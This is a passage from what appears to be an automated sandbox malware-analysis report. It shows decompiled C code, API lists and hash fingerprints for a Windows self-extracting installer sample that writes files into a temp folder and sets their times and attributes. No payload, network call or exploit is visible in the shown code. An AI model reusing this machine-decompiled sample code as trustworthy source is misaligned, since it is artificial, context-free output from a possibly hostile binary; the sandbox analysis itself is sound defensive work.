                                                                                                                                                                                                      						_t33 = E000E4E99(_t75);
                                                                                                                                                                                                      						L35:
                                                                                                                                                                                                      						return E000E6CE0(_t33, _t54, _v8 ^ _t76, _t69, _t73, _t75);
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t35 = _t32 - 1;
                                                                                                                                                                                                      					__eflags = _t35;
                                                                                                                                                                                                      					if(_t35 == 0) {
                                                                                                                                                                                                      						L9:
                                                                                                                                                                                                      						_t33 = 0;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t36 = _t35 - 1;
                                                                                                                                                                                                      					__eflags = _t36;
                                                                                                                                                                                                      					if(_t36 == 0) {
                                                                                                                                                                                                      						_t37 =  *0xe8584; // 0x0
                                                                                                                                                                                                      						__eflags = _t37;
                                                                                                                                                                                                      						if(_t37 != 0) {
                                                                                                                                                                                                      							SetDlgItemTextA(_t37, 0x837,  *(_t75 + 4));
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t54 = 0xe91e4;
                                                                                                                                                                                                      						_t58 = 0xe91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t38 =  *_t58;
                                                                                                                                                                                                      							_t58 =  &(_t58[1]);
                                                                                                                                                                                                      							__eflags = _t38;
                                                                                                                                                                                                      						} while (_t38 != 0);
                                                                                                                                                                                                      						_t59 = _t58 - 0xe91e5;
                                                                                                                                                                                                      						__eflags = _t59;
                                                                                                                                                                                                      						_t71 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t73 =  &(_t71[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t39 =  *_t71;
                                                                                                                                                                                                      							_t71 =  &(_t71[1]);
                                                                                                                                                                                                      							__eflags = _t39;
                                                                                                                                                                                                      						} while (_t39 != 0);
                                                                                                                                                                                                      						_t69 = _t71 - _t73;
                                                                                                                                                                                                      						_t30 = _t59 + 1 + _t71 - _t73;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							L3:
                                                                                                                                                                                                      							_t33 = _t30 | 0xffffffff;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xe91e4;
                                                                                                                                                                                                      						_t30 = E000E4702( &_v268, 0xe91e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(__eflags == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t41 = E000E476D( &_v268, __eflags);
                                                                                                                                                                                                      						__eflags = _t41;
                                                                                                                                                                                                      						if(_t41 == 0) {
                                                                                                                                                                                                      							goto L9;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_push(0x180);
                                                                                                                                                                                                      						_t30 = E000E4980( &_v268, 0x8302); // executed
                                                                                                                                                                                                      						_t75 = _t30;
                                                                                                                                                                                                      						__eflags = _t75 - 0xffffffff;
                                                                                                                                                                                                      						if(_t75 == 0xffffffff) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = E000E47E0( &_v268);
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						 *0xe93f4 =  *0xe93f4 + 1;
                                                                                                                                                                                                      						_t33 = _t75;
                                                                                                                                                                                                      						goto L35;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t44 = _t36 - 1;
                                                                                                                                                                                                      					__eflags = _t44;
                                                                                                                                                                                                      					if(_t44 == 0) {
                                                                                                                                                                                                      						_t54 = 0xe91e4;
                                                                                                                                                                                                      						_t63 = 0xe91e4;
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t45 =  *_t63;
                                                                                                                                                                                                      							_t63 =  &(_t63[1]);
                                                                                                                                                                                                      							__eflags = _t45;
                                                                                                                                                                                                      						} while (_t45 != 0);
                                                                                                                                                                                                      						_t74 =  *(_t75 + 4);
                                                                                                                                                                                                      						_t64 = _t63 - 0xe91e5;
                                                                                                                                                                                                      						__eflags = _t64;
                                                                                                                                                                                                      						_t69 =  &(_t74[1]);
                                                                                                                                                                                                      						do {
                                                                                                                                                                                                      							_t46 =  *_t74;
                                                                                                                                                                                                      							_t74 =  &(_t74[1]);
                                                                                                                                                                                                      							__eflags = _t46;
                                                                                                                                                                                                      						} while (_t46 != 0);
                                                                                                                                                                                                      						_t73 = _t74 - _t69;
                                                                                                                                                                                                      						_t30 = _t64 + 1 + _t74 - _t69;
                                                                                                                                                                                                      						__eflags = _t30 - 0x104;
                                                                                                                                                                                                      						if(_t30 >= 0x104) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 = 0xe91e4;
                                                                                                                                                                                                      						_t30 = E000E4702( &_v268, 0xe91e4,  *(_t75 + 4));
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t69 =  *((intOrPtr*)(_t75 + 0x18));
                                                                                                                                                                                                      						_t30 = E000E4C37( *((intOrPtr*)(_t75 + 0x14)),  *((intOrPtr*)(_t75 + 0x18)),  *(_t75 + 0x1a) & 0x0000ffff); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						E000E4B60( *((intOrPtr*)(_t75 + 0x14))); // executed
                                                                                                                                                                                                      						_t50 =  *(_t75 + 0x1c) & 0x0000ffff;
                                                                                                                                                                                                      						__eflags = _t50;
                                                                                                                                                                                                      						if(_t50 != 0) {
                                                                                                                                                                                                      							_t51 = _t50 & 0x00000027;
                                                                                                                                                                                                      							__eflags = _t51;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t51 = 0x80;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      						_t30 = SetFileAttributesA( &_v268, _t51); // executed
                                                                                                                                                                                                      						__eflags = _t30;
                                                                                                                                                                                                      						if(_t30 == 0) {
                                                                                                                                                                                                      							goto L3;
                                                                                                                                                                                                      						} else {
                                                                                                                                                                                                      							_t33 = 1;
                                                                                                                                                                                                      							goto L35;
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t30 = _t44 - 1;
                                                                                                                                                                                                      					__eflags = _t30;
                                                                                                                                                                                                      					if(_t30 == 0) {
                                                                                                                                                                                                      						goto L3;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					goto L9;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				if(_a4 == 3) {
                                                                                                                                                                                                      					_t30 = E000E4B60( *((intOrPtr*)(_t75 + 0x14)));
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				goto L3;
                                                                                                                                                                                                      			}































                                                                                                                                                                                                      0x000e4ddd
                                                                                                                                                                                                      0x000e4ddd
                                                                                                                                                                                                      0x000e4de3
                                                                                                                                                                                                      0x000e4de8
                                                                                                                                                                                                      0x000e4ded
                                                                                                                                                                                                      0x000e4ded
                                                                                                                                                                                                      0x000e4def
                                                                                                                                                                                                      0x000e4df0
                                                                                                                                                                                                      0x000e4df0
                                                                                                                                                                                                      0x000e4df4
                                                                                                                                                                                                      0x000e4df4
                                                                                                                                                                                                      0x000e4df6
                                                                                                                                                                                                      0x000e4df9
                                                                                                                                                                                                      0x000e4dfc
                                                                                                                                                                                                      0x000e4dfc
                                                                                                                                                                                                      0x000e4dfe
                                                                                                                                                                                                      0x000e4dff
                                                                                                                                                                                                      0x000e4dff
                                                                                                                                                                                                      0x000e4e03
                                                                                                                                                                                                      0x000e4e08
                                                                                                                                                                                                      0x000e4e0a
                                                                                                                                                                                                      0x000e4e0f
                                                                                                                                                                                                      0x000e4d03
                                                                                                                                                                                                      0x000e4d03
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d03
                                                                                                                                                                                                      0x000e4e18
                                                                                                                                                                                                      0x000e4e20
                                                                                                                                                                                                      0x000e4e25
                                                                                                                                                                                                      0x000e4e27
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4e33
                                                                                                                                                                                                      0x000e4e38
                                                                                                                                                                                                      0x000e4e3a
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4e40
                                                                                                                                                                                                      0x000e4e51
                                                                                                                                                                                                      0x000e4e56
                                                                                                                                                                                                      0x000e4e5b
                                                                                                                                                                                                      0x000e4e5e
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4e6a
                                                                                                                                                                                                      0x000e4e6f
                                                                                                                                                                                                      0x000e4e71
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4e77
                                                                                                                                                                                                      0x000e4e7d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4e7d
                                                                                                                                                                                                      0x000e4d25
                                                                                                                                                                                                      0x000e4d25
                                                                                                                                                                                                      0x000e4d28
                                                                                                                                                                                                      0x000e4d36
                                                                                                                                                                                                      0x000e4d3b
                                                                                                                                                                                                      0x000e4d40
                                                                                                                                                                                                      0x000e4d40
                                                                                                                                                                                                      0x000e4d42
                                                                                                                                                                                                      0x000e4d43
                                                                                                                                                                                                      0x000e4d43
                                                                                                                                                                                                      0x000e4d47
                                                                                                                                                                                                      0x000e4d4a
                                                                                                                                                                                                      0x000e4d4a
                                                                                                                                                                                                      0x000e4d4c
                                                                                                                                                                                                      0x000e4d4f
                                                                                                                                                                                                      0x000e4d4f
                                                                                                                                                                                                      0x000e4d51
                                                                                                                                                                                                      0x000e4d52
                                                                                                                                                                                                      0x000e4d52
                                                                                                                                                                                                      0x000e4d56
                                                                                                                                                                                                      0x000e4d5b
                                                                                                                                                                                                      0x000e4d5d
                                                                                                                                                                                                      0x000e4d62
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d67
                                                                                                                                                                                                      0x000e4d6f
                                                                                                                                                                                                      0x000e4d74
                                                                                                                                                                                                      0x000e4d76
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d7c
                                                                                                                                                                                                      0x000e4d84
                                                                                                                                                                                                      0x000e4d89
                                                                                                                                                                                                      0x000e4d8b
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d94
                                                                                                                                                                                                      0x000e4d99
                                                                                                                                                                                                      0x000e4d9e
                                                                                                                                                                                                      0x000e4da1
                                                                                                                                                                                                      0x000e4daa
                                                                                                                                                                                                      0x000e4daa
                                                                                                                                                                                                      0x000e4da3
                                                                                                                                                                                                      0x000e4da3
                                                                                                                                                                                                      0x000e4da3
                                                                                                                                                                                                      0x000e4db5
                                                                                                                                                                                                      0x000e4dbb
                                                                                                                                                                                                      0x000e4dbd
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4dc3
                                                                                                                                                                                                      0x000e4dc5
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4dc5
                                                                                                                                                                                                      0x000e4dbd
                                                                                                                                                                                                      0x000e4d2a
                                                                                                                                                                                                      0x000e4d2a
                                                                                                                                                                                                      0x000e4d2d
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x00000000
                                                                                                                                                                                                      0x000e4d2d
                                                                                                                                                                                                      0x000e4cf8
                                                                                                                                                                                                      0x000e4cfd
                                                                                                                                                                                                      0x000e4d02
                                                                                                                                                                                                      0x00000000

                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • SetFileAttributesA.KERNELBASE(?,?,?,?), ref: 000E4DB5
                                                                                                                                                                                                      • SetDlgItemTextA.USER32(00000000,00000837,?), ref: 000E4DDD
                                                                                                                                                                                                      Strings
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: AttributesFileItemText
                                                                                                                                                                                                      • String ID: C:\Users\user\AppData\Local\Temp\IXP002.TMP\
                                                                                                                                                                                                      • API String ID: 3625706803-183442868
                                                                                                                                                                                                      • Opcode ID: 0194aee21e667eabedb3ffd47ff14f2a4a7b3cadeffcbe24863da9c2b15a908a
                                                                                                                                                                                                      • Instruction ID: 257285bdc946dd2a8f263c72a533352c6277e1b53e464701a06542993dd73dd1
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0194aee21e667eabedb3ffd47ff14f2a4a7b3cadeffcbe24863da9c2b15a908a
                                                                                                                                                                                                      • Instruction Fuzzy Hash: A54157366081818FCB758F3ADD446F973E6EB46700F1446A8D882B7282DF31DE4AC790
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E4C37(signed int __ecx, int __edx, int _a4) {
                                                                                                                                                                                                      				struct _FILETIME _v12;
                                                                                                                                                                                                      				struct _FILETIME _v20;
                                                                                                                                                                                                      				FILETIME* _t14;
                                                                                                                                                                                                      				int _t15;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t21 = __ecx * 0x18;
                                                                                                                                                                                                      				if( *((intOrPtr*)(_t21 + 0xe8d64)) == 1 || DosDateTimeToFileTime(__edx, _a4,  &_v20) == 0 || LocalFileTimeToFileTime( &_v20,  &_v12) == 0) {
                                                                                                                                                                                                      					L5:
                                                                                                                                                                                                      					return 0;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					_t14 =  &_v12;
                                                                                                                                                                                                      					_t15 = SetFileTime( *(_t21 + 0xe8d74), _t14, _t14, _t14); // executed
                                                                                                                                                                                                      					if(_t15 == 0) {
                                                                                                                                                                                                      						goto L5;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return 1;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}









                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • DosDateTimeToFileTime.KERNEL32(?,?,?), ref: 000E4C54
                                                                                                                                                                                                      • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 000E4C66
                                                                                                                                                                                                      • SetFileTime.KERNELBASE(?,?,?,?), ref: 000E4C7E
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: Time$File$DateLocal
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 2071732420-0
                                                                                                                                                                                                      • Opcode ID: c803ec8a4d575148e886c44270e4329d98d5124db9d7dffb55fcd675b4adf35b
                                                                                                                                                                                                      • Instruction ID: e31da6ce5d3e623b71acc0468cd79e71e07dd674f80629f1d4332a908829965a
                                                                                                                                                                                                      • Opcode Fuzzy Hash: c803ec8a4d575148e886c44270e4329d98d5124db9d7dffb55fcd675b4adf35b
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 66F0BB7260124C6F9BA9DFB5CC48DFB77ECEB0D744744452BA415E2050EA34F914D761
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 75%
                                                                                                                                                                                                      			E000E487A(CHAR* __ecx, signed int __edx) {
                                                                                                                                                                                                      				void* _t7;
                                                                                                                                                                                                      				CHAR* _t11;
                                                                                                                                                                                                      				long _t18;
                                                                                                                                                                                                      				long _t23;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t11 = __ecx;
                                                                                                                                                                                                      				asm("sbb edi, edi");
                                                                                                                                                                                                      				_t18 = ( ~(__edx & 3) & 0xc0000000) + 0x80000000;
                                                                                                                                                                                                      				if((__edx & 0x00000100) == 0) {
                                                                                                                                                                                                      					asm("sbb esi, esi");
                                                                                                                                                                                                      					_t23 = ( ~(__edx & 0x00000200) & 0x00000002) + 3;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					if((__edx & 0x00000400) == 0) {
                                                                                                                                                                                                      						asm("sbb esi, esi");
                                                                                                                                                                                                      						_t23 = ( ~(__edx & 0x00000200) & 0xfffffffe) + 4;
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t23 = 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				_t7 = CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0); // executed
                                                                                                                                                                                                      				if(_t7 != 0xffffffff || _t23 == 3) {
                                                                                                                                                                                                      					return _t7;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					E000E490C(_t11);
                                                                                                                                                                                                      					return CreateFileA(_t11, _t18, 0, 0, _t23, 0x80, 0);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}








                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CreateFileA.KERNELBASE(00008000,-80000000,00000000,00000000,?,00000080,00000000,00000000,00000000,00000000,000E4A23,?,000E4F67,*MEMCAB,00008000,00000180), ref: 000E48DE
                                                                                                                                                                                                      • CreateFileA.KERNEL32(00008000,-80000000,00000000,00000000,?,00000080,00000000,?,000E4F67,*MEMCAB,00008000,00000180), ref: 000E4902
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CreateFile
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 823142352-0
                                                                                                                                                                                                      • Opcode ID: 9bb8a60c650ce9cd92c6100b451656493633ae551ef47ddb992c74e63a1d34b8
                                                                                                                                                                                                      • Instruction ID: f52a5bbe5b1565d073ac248e8643576d5645f1fe97a0cad712c4c8ce9d2c00ea
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9bb8a60c650ce9cd92c6100b451656493633ae551ef47ddb992c74e63a1d34b8
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 29014BA3E115B02AF364402A4C88FBB555CCB9AB34F1B0335BDAAFB1D2D5A85C0481E0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E000E4AD0(signed int _a4, void* _a8, long _a12) {
                                                                                                                                                                                                      				signed int _t9;
                                                                                                                                                                                                      				int _t12;
                                                                                                                                                                                                      				signed int _t14;
                                                                                                                                                                                                      				signed int _t15;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				struct HWND__* _t21;
                                                                                                                                                                                                      				signed int _t24;
                                                                                                                                                                                                      				signed int _t25;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t20 =  *0xe858c; // 0x268
                                                                                                                                                                                                      				_t9 = E000E3680(_t20);
                                                                                                                                                                                                      				if( *0xe91d8 == 0) {
                                                                                                                                                                                                      					_push(_t24);
                                                                                                                                                                                                      					_t12 = WriteFile( *(0xe8d74 + _a4 * 0x18), _a8, _a12,  &_a12, 0); // executed
                                                                                                                                                                                                      					if(_t12 != 0) {
                                                                                                                                                                                                      						_t25 = _a12;
                                                                                                                                                                                                      						if(_t25 != 0xffffffff) {
                                                                                                                                                                                                      							_t14 =  *0xe9400; // 0xab400
                                                                                                                                                                                                      							_t15 = _t14 + _t25;
                                                                                                                                                                                                      							 *0xe9400 = _t15;
                                                                                                                                                                                                      							if( *0xe8184 != 0) {
                                                                                                                                                                                                      								_t21 =  *0xe8584; // 0x0
                                                                                                                                                                                                      								if(_t21 != 0) {
                                                                                                                                                                                                      									SendDlgItemMessageA(_t21, 0x83a, 0x402, _t15 * 0x64 /  *0xe93f8, 0);
                                                                                                                                                                                                      								}
                                                                                                                                                                                                      							}
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					} else {
                                                                                                                                                                                                      						_t25 = _t24 | 0xffffffff;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return _t25;
                                                                                                                                                                                                      				} else {
                                                                                                                                                                                                      					return _t9 | 0xffffffff;
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      			}












                                                                                                                                                                                                      APIs
                                                                                                                                                                                                        • Part of subcall function 000E3680: MsgWaitForMultipleObjects.USER32(00000001,?,00000000,000000FF,000004FF), ref: 000E369F
                                                                                                                                                                                                        • Part of subcall function 000E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000E36B2
                                                                                                                                                                                                        • Part of subcall function 000E3680: PeekMessageA.USER32(?,00000000,00000000,00000000,00000001), ref: 000E36DA
                                                                                                                                                                                                      • WriteFile.KERNELBASE(?,?,?,?,00000000), ref: 000E4B05
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: MessagePeek$FileMultipleObjectsWaitWrite
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 1084409-0
                                                                                                                                                                                                      • Opcode ID: 1d54b938dd4c1f6d5786e104bd91d43cb1caa7d3ff0e0c3cdfbe6acea7dbd614
                                                                                                                                                                                                      • Instruction ID: 33843c226b6f1d93e7ccaca42b817e090e65a06f560f33a1faff8526652c3fe6
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1d54b938dd4c1f6d5786e104bd91d43cb1caa7d3ff0e0c3cdfbe6acea7dbd614
                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5C019271200281AFEB558F6ADC85BA6779AF744B25F048225F939BF1E0CB78D811CB41
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                                                                      			E000E658A(char* __ecx, void* __edx, char* _a4) {
                                                                                                                                                                                                      				intOrPtr _t4;
                                                                                                                                                                                                      				char* _t6;
                                                                                                                                                                                                      				char* _t8;
                                                                                                                                                                                                      				void* _t10;
                                                                                                                                                                                                      				void* _t12;
                                                                                                                                                                                                      				char* _t16;
                                                                                                                                                                                                      				intOrPtr* _t17;
                                                                                                                                                                                                      				void* _t18;
                                                                                                                                                                                                      				char* _t19;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t16 = __ecx;
                                                                                                                                                                                                      				_t10 = __edx;
                                                                                                                                                                                                      				_t17 = __ecx;
                                                                                                                                                                                                      				_t1 = _t17 + 1; // 0xe8b3f
                                                                                                                                                                                                      				_t12 = _t1;
                                                                                                                                                                                                      				do {
                                                                                                                                                                                                      					_t4 =  *_t17;
                                                                                                                                                                                                      					_t17 = _t17 + 1;
                                                                                                                                                                                                      				} while (_t4 != 0);
                                                                                                                                                                                                      				_t18 = _t17 - _t12;
                                                                                                                                                                                                      				_t2 = _t18 + 1; // 0xe8b40
                                                                                                                                                                                                      				if(_t2 < __edx) {
                                                                                                                                                                                                      					_t19 = _t18 + __ecx;
                                                                                                                                                                                                      					if(_t19 > __ecx) {
                                                                                                                                                                                                      						_t8 = CharPrevA(__ecx, _t19); // executed
                                                                                                                                                                                                      						if( *_t8 != 0x5c) {
                                                                                                                                                                                                      							 *_t19 = 0x5c;
                                                                                                                                                                                                      							_t19 =  &(_t19[1]);
                                                                                                                                                                                                      						}
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					_t6 = _a4;
                                                                                                                                                                                                      					 *_t19 = 0;
                                                                                                                                                                                                      					while( *_t6 == 0x20) {
                                                                                                                                                                                                      						_t6 = _t6 + 1;
                                                                                                                                                                                                      					}
                                                                                                                                                                                                      					return E000E16B3(_t16, _t10, _t6);
                                                                                                                                                                                                      				}
                                                                                                                                                                                                      				return 0x8007007a;
                                                                                                                                                                                                      			}













                                                                                                                                                                                                      APIs
                                                                                                                                                                                                      • CharPrevA.USER32(000E8B3E,000E8B3F,00000001,000E8B3E,-00000003,?,000E60EC,000E1140,?), ref: 000E65BA
                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                      • Source File: 00000002.00000002.430701933.00000000000E1000.00000020.00000001.01000000.00000005.sdmp, Offset: 000E0000, based on PE: true
                                                                                                                                                                                                      • Associated: 00000002.00000002.430673147.00000000000E0000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430721183.00000000000E8000.00000004.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EA000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      • Associated: 00000002.00000002.430733752.00000000000EC000.00000002.00000001.01000000.00000005.sdmp
                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                      • Snapshot File: hcaresult_2_2_e0000_sSH13Pp30.jbxd
                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                      • API ID: CharPrev
                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                      • API String ID: 122130370-0
                                                                                                                                                                                                      • Opcode ID: 6c9985212f76442f93cdbbde374d90eba04f688d67b36dbc08e76c34471bd020
                                                                                                                                                                                                      • Instruction ID: 3e2a36f3d9c7ea82a2d96c4ad886cf12f092b99713da03da426a63f70f147e38
                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6c9985212f76442f93cdbbde374d90eba04f688d67b36dbc08e76c34471bd020
                                                                                                                                                                                                      • Instruction Fuzzy Hash: F9F02D333046D09FD331051BA884BA7BFD99BA6390F14055AE8DAE3205CA675C4583A0
                                                                                                                                                                                                      Uniqueness

                                                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                                                      C-Code - Quality: 93%
                                                                                                                                                                                                      			E000E621E() {
                                                                                                                                                                                                      				signed int _v8;
                                                                                                                                                                                                      				char _v268;
                                                                                                                                                                                                      				signed int _t5;
                                                                                                                                                                                                      				void* _t9;
                                                                                                                                                                                                      				void* _t13;
                                                                                                                                                                                                      				void* _t19;
                                                                                                                                                                                                      				void* _t20;
                                                                                                                                                                                                      				signed int _t21;
                                                                                                                                                                                                      
                                                                                                                                                                                                      				_t5 =  *0xe8004; // 0xb7c20988
                                                                                                                                                                                                      				_v8 = _t5 ^ _t21;
                                                                                                                                                                                                      				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                      					0x4f0 = 2;
